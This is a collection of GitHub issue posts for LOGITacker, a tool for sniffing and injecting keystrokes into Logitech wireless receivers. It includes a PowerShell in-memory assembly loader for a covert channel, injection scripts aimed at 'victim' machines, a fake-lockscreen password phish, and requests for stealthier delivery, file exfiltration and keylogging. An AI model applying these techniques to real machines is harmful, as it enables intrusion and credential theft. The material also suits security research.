rogandawes / logitacker
Enumerate and test Logitech wireless input devices for vulnerabilities with a nRF52840 radio dongle.
License: GNU General Public License v3.0
Hi,
I have investigated a way to get a covert channel for Linux systems. As most actions require higher privileges (like root) there is no way to use them (e.g. send raw HID messages to an input device).
My approach is to use plain user privileges to set keyboard LEDs:
for i in $(seq 1 32); do xset -led $i led on; done
or
for i in $(seq 1 32); do xset -led $i led off; done
A quick look shows some output in LOGITacker:
<info> LOGITACKER_USB: hid kbd evt: APP_USBD_HID_USER_EVT_OUT_REPORT_READY
<info> LOGITACKER_USB: 00 05 |..
<info> LOGITACKER_USB: hid kbd evt: APP_USBD_HID_USER_EVT_OUT_REPORT_READY
<info> LOGITACKER_USB: 00 01 |..
I think there may be some chance to implement some sort of information channel. If some LEDs would be used for some kind of modulation scheme the output stream of a shell could be transmitted this way. This may work similar to the Windows version of the covert channel, implemented already.
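Decoding the two-byte OUT reports quoted in the log above, as an added example that is not part of the original post and not LOGITacker code. It assumes the first byte is the report ID and the second is the standard HID boot-keyboard LED bitmap; the `max_changes` threshold for flagging heavy LED toggling is an illustrative value, not one taken from the project.

```python
import re

# LED usage bits of a HID boot-keyboard OUT report (USB HID LED usage page).
LED_BITS = {0: "NumLock", 1: "CapsLock", 2: "ScrollLock", 3: "Compose", 4: "Kana"}

# Matches hex-dump lines such as "<info> LOGITACKER_USB: 00 05 |.."
DUMP_RE = re.compile(r"LOGITACKER_USB:\s+((?:[0-9A-Fa-f]{2}\s+)+)\|")

# Sample input: the four log lines quoted in the post above.
SAMPLE_LOG = """\
<info> LOGITACKER_USB: hid kbd evt: APP_USBD_HID_USER_EVT_OUT_REPORT_READY
<info> LOGITACKER_USB: 00 05 |..
<info> LOGITACKER_USB: hid kbd evt: APP_USBD_HID_USER_EVT_OUT_REPORT_READY
<info> LOGITACKER_USB: 00 01 |..
"""


def parse_led_reports(log_text):
    """Return the LED bitmap of every 2-byte OUT report dump found in the log."""
    bitmaps = []
    for line in log_text.splitlines():
        match = DUMP_RE.search(line)
        if not match:
            continue  # event-name lines and unrelated log output
        data = bytes.fromhex("".join(match.group(1).split()))
        if len(data) != 2:
            continue  # assumption: byte 0 = report ID, byte 1 = LED bitmap
        bitmaps.append(data[1] & 0x1F)  # the upper 3 bits are padding
    return bitmaps


def led_names(bitmap):
    """Translate an LED bitmap into the names of the LEDs that are lit."""
    return [name for bit, name in LED_BITS.items() if bitmap & (1 << bit)]


def summarize(bitmaps, max_changes=4):
    """Count LED state changes in a capture and report which LEDs flipped.

    max_changes is an assumed threshold: a user pressing lock keys produces
    a handful of changes, a process cycling LEDs in a loop produces many.
    """
    changes = 0
    toggled = 0
    for prev, cur in zip(bitmaps, bitmaps[1:]):
        diff = prev ^ cur
        if diff:
            changes += 1
            toggled |= diff
    return {
        "states": [led_names(b) for b in bitmaps],
        "changes": changes,
        "toggled": led_names(toggled),
        "heavy_toggling": changes > max_changes,
    }


if __name__ == "__main__":
    print(summarize(parse_led_reports(SAMPLE_LOG)))
```

Under these assumptions the two reports in the post differ only in the Scroll Lock bit, with Num Lock lit in both.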
An attempt was made to run the covert_channel powershell code. It didn't work.
This was tested on a recent 1909 Windows 10 system.
$b="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";nal no New-Object -F;$m=no IO.MemoryStream;$a=no byte[] 1024;$gz=(no IO.Compression.GZipStream((no IO.MemoryStream -ArgumentList @(,[Convert]::FromBase64String($b))), [IO.Compression.CompressionMode]::Decompress));$n=0;do{$n=$gz.Read($a,0,$a.Length);$m.Write($a,0,$n)}while ($n -gt 0);[System.Reflection.Assembly]::Load($m.ToArray());[LogitackerClient.Runner]::Run()
GAC Version Location
False v2.0.50727
Start shell and wait for traffic on Unifying receiver...
Path: \?\hid#vid_1532&pid_0043&mi_01&col01#7&25c2db31&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_01#7&1d4f9d7a&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 65, Output: 65
Path: \?\hid#virtualdevice&10&col04#2&3457a17c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#virtualdevice&10&col05#2&3457a17c&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 3, Output: 0
Path: \?\hid#virtualdevice&10&col02#2&3457a17c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_00#7&1eb9d6f&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1532&pid_0043&mi_01&col02#7&25c2db31&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_01&col03#7&25c2db31&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1532&pid_0043&mi_02#7&39588f8&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col04#7&25c2db31&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col02#7&a1f813c&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_00#7&3491f60b&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1532&pid_0043&mi_01&col05#7&25c2db31&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 16, Output: 0
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col01#7&a1f813c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#virtualdevice&10&col03#2&3457a17c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}\kbd
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col03#7&a1f813c&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col01#7&10bab849&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Path: \?\hid#vid_1b1c&pid_1b38&mi_00&col04#7&a1f813c&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 64, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col02#7&10bab849&0&0001#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 5, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col03#7&10bab849&0&0002#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 2, Output: 0
Path: \?\hid#vid_046d&pid_c534&mi_01&col04#7&10bab849&0&0003#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 7, Output: 7
Path: \?\hid#vid_046d&pid_c534&mi_01&col05#7&10bab849&0&0004#{4d1e55b2-f16f-11cf-88cb-001111000030}
Input: 20, Output: 20
Path: \?\hid#virtualdevice&10&col01#2&3457a17c&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}
Exception calling "Run" with "0" argument(s): "Object reference not set to an instance of an object."
At line:1 char:7253
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
logitacker_aprdongle.zip
Here is a patch, to make LOGITacker work with the APR Brother Dongle (based on the pca10059 build)
hex and uf2 file attached in zip file
-- logitacker_pca10059.ld 2019-07-12 07:41:20.386670177 +0000
+++ logitacker_pca10059a.ld 2019-07-12 07:41:46.526489027 +0000
@@ -5,8 +5,8 @@
MEMORY
{
- FLASH (rx) : ORIGIN = 0x1000, LENGTH = 0xff000
- RAM (rwx) : ORIGIN = 0x20000008, LENGTH = 0x3fff8
+ FLASH (rx) : ORIGIN = 0x26000, LENGTH = 0xda000
+ RAM (rwx) : ORIGIN = 0x200022e0, LENGTH = 0x3dd20
}
SECTIONS
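Review bot: The new FLASH origin 0x26000 and RAM origin 0x200022e0 in the MEMORY block are bare constants with no comment saying what occupies the 0x26000 bytes of flash and 0x22e0 bytes of RAM now left below the application. Add a comment above each line naming what the reserved region is for and where the figures come from, so they can be re-checked if that component changes size. The arithmetic itself is consistent: both regions still end where they did before (0x26000 + 0xda000 = 0x1000 + 0xff000 = 0x100000, and 0x200022e0 + 0x3dd20 = 0x20000008 + 0x3fff8 = 0x20040000). The header shows the result saved as logitacker_pca10059a.ld, so confirm the build for this dongle references the new file name.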
Via tests, I find that I can not download or steal files from the target computer, with no internet network and any other network.
After we get the cmd shell of the target computer, I find that the process running on the target computer is powershell.exe, which started when injected.
Maybe we could improve the framework to upload and download small files between the client and the target computer, just like the meterpreter framework of others.
I don't know how to finish the work above, can anyone help me???
Queue of app_scheduler constantly full in promiscuous mode field test, crowded with traffic at 2.4GHz.
Possible solutions:
Assure all pending frames are processed (enable input present flag, even if no frame is enqueued because buffer runs out)
I just followed this README, then downloaded nrfutil.exe and executed it.
But it has three firmware types, I am really a little confused. Can anyone give me some help?
As per the title, would be useful to be able to stop the discover scan as in a Logitech rich environment it can be difficult to see the output of the devices list :)
hi, i just tried the new version and after flashing and restarting the device, it doesn't appear in the device list...
But when i put old version, all is ok...
what can be wrong?
how to troubleshoot this? :)
tnx.
Minor error in 'option discover onhit' help text
Help text for passive-enum should read "enter passive enumeration mode", and not "enter active enumeration mode"
LOGITacker (discover) $ options discover onhit
onhit - select action to take when device a RF address is discovered
Options:
-h, --help :Show command help.
Subcommands:
continue :stay in discover mode.
active-enum :enter active enumeration mode
passive-enum :enter active enumeration mode
auto-inject :enter injection mode and execute injection
I am missing the h file when compiling
#include "crc16.h"
#include "app_util_platform.h"
My nRF52840 no longer wants to store any settings/scripts.
I have tried the last 3 firmware releases and I encounter the same problem each time:
LOGITacker (discover) $ options store
<warning> LOGITACKER_OPTIONS: failed to find Flash Data Storage record for global options: 2
<error> LOGITACKER_OPTIONS: failed to write global options to Flash Data Storage
<info> LOGITACKER_OPTIONS: global options stored to Flash Data Storage
LOGITacker (discover) $ script store test
<error> LOGITACKER_SCRIPT_ENGINE: failed to write first task for script storage
<info> app: Storing script failed
Do you have any suggestions on what the problem could be?
Thanks
John
Hello,
I am very new to this kind of playing so please be polite.
i would like to share my devices-list, where injection was successful:
Logitech M525, Unify Receiver CU0007 - FW 012.001.00019
Logitech M185, Receiver CU0010 - FW 029.001.00016
let me know which devices work for you.
thanks
James
Hi Mame82,
I cannot find anything for my issue, so I ask you if you have some info. My dongle doesn’t seem to work. I’ve tested on Linux and Windows and nothing appears on USB debug.
I tried your steps to flash Logitacker inside it and cannot have the USB storage for the firmware inside. I tried multiple times plugging it in with the button pushed or double pushing before plugging in and nothing happened.
Do you think my device is bricked?
Sorry for the inconvenience.
Thank you,
Is there a different instruction set for U0008 and U0012? I only have 1 0007 and I can't seem to get 0008 to work. The script gets transmitted but nothing executes on my victim end. The receiver is out of box version.
Is there a way to flash the vulnerable firmware into the receiver?
Is it available to sniff raw nrf24 frames for unknown devices without changing code of toolkit? Or can you add it to TODO list?
hi mame :)
with new version i have issue to execute inject...
LOGITacker (injection) $ script load calc_win10
<info> LOGITACKER_SCRIPT_ENGINE: script calc_win10 file_id 1004
<error> LOGITACKER_SCRIPT_ENGINE: logitacker_script_engine_load_script_from_flash: failed to read task data
<info> app: loading script failed
LOGITacker (injection) $ inject target F3:F4:95:87:08
inject target F3:F4:95:87:08
Trying to send keystrokes using address F3:F4:95:87:08
<info> app: parsed addr len 5:
<info> app: F3 F4 95 87 08 |.....
<info> LOGITACKER_PROCESSOR_INJECT: Stop injection mode for address F3:F4:95:87:08
<info> LOGITACKER_RADIO: Channel hopping stopped
<info> LOGITACKER_PROCESSOR_INJECT: Initializing injection mode for F3:F4:95:87:08
<info> LOGITACKER_RADIO: Channel hopping stopped
<info> ESB_ILLEGALMOD: Using channel table 'Unifying'
<info> ESB_ILLEGALMOD: New channel table with length 25
LOGITacker (injection) $ inject execute
<info> LOGITACKER_PROCESSOR_INJECT: No more tasks scheduled
<info> LOGITACKER_PROCESSOR_INJECT: script execution succeeded
<info> LOGITACKER: Injection processing resumed
but nothing happening...
Hello,
as i read the documents, for unpair all you need access to the victim's receiver, is that correct?
what does the scenario look like, when you have no access to the receiver to unpair?
which commands are needed then?
best regards
James
Hey, another thought that might improve things in a noisy environment, maybe it's worth implementing. I have honestly no idea for the different supported hardware how much memory is available but might be worth thinking about it.
The idea is to have a ringbuffer of a couple of bytes/keystrokes/mouse movements associated with each device (especially for there being a few unencrypted around here still), maybe configurable at compile/run time? When listing the devices this could then display those, which is a bit nicer in display than the single keycodes in the logs as well as a bit better for many devices than passing it through to the host.
Hi,
Can't wait to play with this! I will wait for tomorrow to detach the pcb from the dongle and solder it to my USB connector from adafruit that was laying around, but while looking at the source code i saw that only US and DE were present, so i'd like to take care of adding support for french (azerty) keyboard since you must have a lot of work already and i'd hate to add more :)
I just want to be sure to do the right thing before i start so i don't spend time on it for nothing, i was planning on using this file as reference :
to modify this one (starting at line 275) :
https://raw.githubusercontent.com/mame82/LOGITacker/master/logitacker/logitacker_keyboard_map.h
but maybe i've got it all wrong and this is not the way to do it.. in which case i'll just leave this here and hope it can be implemented in the future :)
The README states:
To program the dongle follow these steps:
disconnect the dongle from the host
double-click button on the dongle (through the tiny hole)
copy logitacker_apr-dongle.uf2 to the removable drive 'NRF52BOOT'
The actual process was:
To program the dongle follow these steps:
disconnect the dongle from the host
hold the button on the dongle (through the tiny hole) while plugging into the host
copy logitacker_apr-dongle.uf2 to the removable drive 'NRF52BOOT'
This binary does not appear to be working with the April Brother dongle as the v0.1.3 did.
Steps to reproduce:
The dongle has been tested successfully with the v0.1.3 build afterwards.
Hi,
While I understand LOGITacker to be a sniffer tool, I was wondering if the expertise here can be re-purposed to create a Logitech Unifying compatible keyboard using the NRF24 via an Arduino/ESP8266/32.
I need info on the unifying RF protocol, especially on pairing and transmission of data. So far, I have some success with https://github.com/ronangaillard/logitech-mouse. Do also let me know if there is a better place to discuss this.
Thank you.
"connnect" < 3 x "n" in:
https://github.com/RoganDawes/LOGITacker/blame/a5e63823436ccfcfade2c9cd4c00532259218f83/logitacker/logitacker_cli.c#L1460
Is it a typo or another easter egg? :D
It would be nice to have support for mouse injections (in my case only movement is necessary, but it would probably be nice for completeness to be able to click arbitrary buttons too).
Hello, I have plans on getting into this project, as I think it is rather nifty. My question is, would it be possible to write firmware that can then be programmed into the receiver for the express purpose of connecting to LOGITacker? I like the idea of P4wnP1, especially the complexity of the scripts, but a RPi 0 is pretty noticeable :). Or, could it be possible to make LOGITacker program scripts into the receiver, and autorun the scripts upon being plugged in? Sorry if this is exactly what it does, I'm still very new to this project.
When running the !sharplock command on a Windows 10 victim machine, the fake login "Form1" window is displayed in front of all other windows, however the last focused window remains in focus and receives the user's password as input.
Tapping the window or pressing Alt+Tab will give it focus.
Furthermore, without LIGHTSPEED, the transmission of the !sharplock shellcode takes roughly two minutes, as measured by the console traffic on the LOGITacker console. However, the fake lockscreen already appears on the victim screen after one minute, so I assume the first minute is the actual transmission of the payload, and the second minute is merely the echo from the covert channel console. If there is an easy way to suppress the echo during payload transmission, that could reduce the time to 50%! :)
Thanks for the awesome work, BTW!
Which version of SDK did you build?
I'm trying use the pair feature, but the command seems broken:
LOGITacker (sniff pairing) $ pair device
pair: unknown parameter: device
I can actually see the device over the CLI interface:
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr XX:XX:XX:XX:XX, len: 15, ch idx 1, raw ch 8, rssi 43)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr XX:XX:XX:XX:XX, len: 15, ch idx 1, raw ch 8, rssi 43)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
I'm now getting into the code to see if I can figure this out.
I have tried saving some long scripts, just over 300 lines, and it doesn't work. The Brother dongle reboots when I try to execute "script store script_name"
You can visit my repos if you want to see what I am trying.
I deployed the covert channel on a CU-12 and it works very well. But if the targeted dongle is not with the LIGHTSPEED firmware (e.g. original C-U0012 not flashed), it takes a few minutes to deploy the covert channel (a few seconds for the powershell terminal then a few minutes for the rest of the hidden code).
During these few minutes, if the targeted user clicks with his mouse on a text zone, the entire payload will not be transmitted to the powershell terminal and the covert channel will not work.
To avoid this and increase the chances of success, would it be possible to force the mouse pointer in a corner of the screen (example: upper right corner)?
Upper case Y and Z swapped, test others
Hello it's me again,
I've managed to inject commands on Windows machines and it works like a charm.
Then I tried to inject on Linux but nothing happens. I get the feedback from the command line which informs me that the commands are sent, but on the Linux victim machine nothing happens.
Any idea why ?
I've tried on a Kali 2018 and 2019 image, but I don't think this really matters...
Also my payload is something like:
press GUI
delay 500
string terminal
press ENTER
delay 500
but again I think this depends neither on this.
It's very hard for me to find CU007 or CU0012 dongles. Are there any other dongles that have this same vulnerability in LOGITacker?
For example, CU0008 is very common; does that dongle also have the same vulnerability?
I believe it would be fairly simple to change the code for covert channel payloads (sharplocker atm is ‘hardcoded’).
Since the payload is executed by a simple powershell base64 encoded string, we could change the function to add options for loading/storing the base64 string, similar to when devices are added/stored.
Practically, that would make LOGITacker an advanced Rubberducky.
I will look into that, if no one does before me ;)
I have successfully deployed covert_channel to my device and when I issue command :
covert_channel connect xx:xx:xx:xx:xx I get the following returned:
please specify a subcommand.
Am using latest 0.2.3-beta on April Brother dongle.
Any ideas what subcommand should be used?
It would be nice to have a command or ability that tells us the revision of the firmware installed. This will be especially useful to those who aren't compiling/installing from source
It would be nice to see the active devices' signal strength when looking at devices. That way it's easier to target devices that are still actively in range.
nRF crashes after few seconds of traffic decoding. With raw pass-through enabled. It seems like it can't keep up with the keyboard. But then again it has no problem when pass through is disabled. I've tried halting the logs and closing the terminal. But the result is always the same, it reboots.
Steps leading to the bug:
Device: nRF52840-Dongle
Firmware: v0.1.2-beta
Keyboard: Logitech K350
Hi,
as the title says, pairing a cu0007 dongle flashed with the G700 firmware doesn't work with the April Brother. I didn't know where to put this issue, in the munifying repo or here, so if this is the wrong place please just inform me and I will create the issue in the other repo as well.
LOGITacker Version: 0.2.1
munifying Version: current git status
Log:
./munifying info
Found CU0007 Dongle for G700/G700s mouse
Using dongle USB config: Configuration 1
Resetting dongle in order to release it from kernel (connected devices won't be usable)
EP descr: ep #1 IN (address 0x81) interrupt - undefined usage [8 bytes]
EP descr: ep #2 IN (address 0x82) interrupt - undefined usage [20 bytes]
HID++ interface: vid=046d,pid=c531,bus=2,addr=5,config=1,if=1,alt=0
HID++ interface IN endpoint: ep #2 IN (address 0x82) interrupt - undefined usage [20 bytes]
Dongle Info
Firmware (maj.minor.build): RQR21.00.B0007
Bootloader (maj.minor): 02.14
WPID: 8006
(likely) protocol: 0x07
Serial: a2:18:9e:70
Connected devices: 0
Closing Logitech receiver in Firmware mode (not bootloader)...
./munifying pair
Found CU0007 Dongle for G700/G700s mouse
Using dongle USB config: Configuration 1
Resetting dongle in order to release it from kernel (connected devices won't be usable)
EP descr: ep #1 IN (address 0x81) interrupt - undefined usage [8 bytes]
EP descr: ep #2 IN (address 0x82) interrupt - undefined usage [20 bytes]
HID++ interface: vid=046d,pid=c531,bus=2,addr=5,config=1,if=1,alt=0
HID++ interface IN endpoint: ep #2 IN (address 0x82) interrupt - undefined usage [20 bytes]
Enable pairing for 60 seconds
USB Report type: HID++ short message, DeviceID: 0xff, SubID: SET REGISTER SHORT, Params: 0xb2 0x00 0x00 0x00
Register address: REGISTER PAIRING
Value: 0x00 0x00 0x00
... Enable pairing response (should be enabled)
Printing follow up reports ...
LOGITacker (discover) $ pair device run
Trying to pair using Unifying global pairing address
LOGITACKER_RADIO: Channel hopping stopped
LOGITACKER_PROCESSOR_PAIR_DEVICE: Try to pair new device on target address BB:0A:DC:A5:75
LOGITACKER_RADIO: Channel hopping stopped
ESB_ILLEGALMOD: Using channel table 'Unifying pairing'
ESB_ILLEGALMOD: New channel table with length 11
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 0
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 1
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 5F 01 DE AD BE EF 82|._......
LOGITACKER_PROCESSOR_PAIR_DEVICE: 08 13 37 04 00 01 05 0 |......
LOGITACKER_PROCESSOR_PAIR_DEVICE: 00 00 00 00 00 A9 |......
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
LOGITACKER_PROCESSOR_PAIR_DEVICE: Phase before RX: 1
LOGITACKER_PROCESSOR_PAIR_DEVICE: |
LOGITACKER_PROCESSOR_PAIR_DEVICE: RX phase after parsing: 2
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 2
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 40 01 DE 00 |.@...
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
LOGITACKER_PROCESSOR_PAIR_DEVICE: Phase before RX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: |
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: update TX payload called for unknown pairing phase: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 40 01 DE 00 |.@...
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
LOGITACKER_PROCESSOR_PAIR_DEVICE: Phase before RX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: |
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: update TX payload called for unknown pairing phase: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 40 01 DE 00 |.@...
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
LOGITACKER_PROCESSOR_PAIR_DEVICE: Phase before RX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: |
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase before TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: update TX payload called for unknown pairing phase: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: phase after TX: 3
LOGITACKER_PROCESSOR_PAIR_DEVICE: E1 40 01 DE 00 |.@...
LOGITACKER_PROCESSOR_PAIR_DEVICE: TX'ed to BB:0A:DC:A5:75
After executing "pair device run" nothing happens in the munifying pairing process ("Printing follow up reports ..."). I tried this procedure in standard workmode and in g700 workmode and with different OS-setups:
When in passive_enum mode, it would be great to have a small in-RAM buffer (maybe something like 1k?) containing the human-readable sequence of sniffed and decrypted keys, that can be displayed over tty with a command like keylog, and produce something like this output:
> keylog
google.com[RETURN]usr[BACKSPACE]er[TAB]sEcReT[RETURN]
It should be possible to use the existing language layout to do the reverse mapping, right? :)
hello,
i use this script to inject:
LOGITacker (discover) $ script press NUMLOCK
LOGITacker (discover) $ script press GUI R
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script altstring "notepad.exe"
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script press RETURN
LOGITacker (discover) $ script altstring "here comes some demo text. Very much characters. At least 24!"
what happens:
the first run works fine, the second run, without any changes, fails.
any ideas what could be wrong?
thanks in advance
James
stupid question, but I want to determine which dongle I'm probably attacking, so it would be nice to know, how the RSSI value can be deciphered?
A higher number should be a nearer target, but which value is for instance the max value and which one the lowest possible?
aliases add: devices storage load (IMPLANT-DEVICE-ADDRESS)
aliases add: script load (TARGET-STORED-SCRIPT)
aliases add: inject target (IMPLANT-DEVICE-ADDRESS)
aliases add: inject execute
aliases store: macattack
Notes:
*Aliases always are loaded on startup.
**Aliases cannot be named after a protected LOGITacker command.
***Aliases accept all related LOGITacker commands/actions
Tested it a couple of times, it's awesome, but there's a little problem with the profile image. I only got it to retrieve like 1/5 times, sometimes even less. Am I the only one with the issue?
Does this current work using a CrazyRadio PA dongle like mousejack? It has an nRF24LU1+ chip. Mousejack is pretty cool and all, but your software here looks to go more in depth and do more stuff.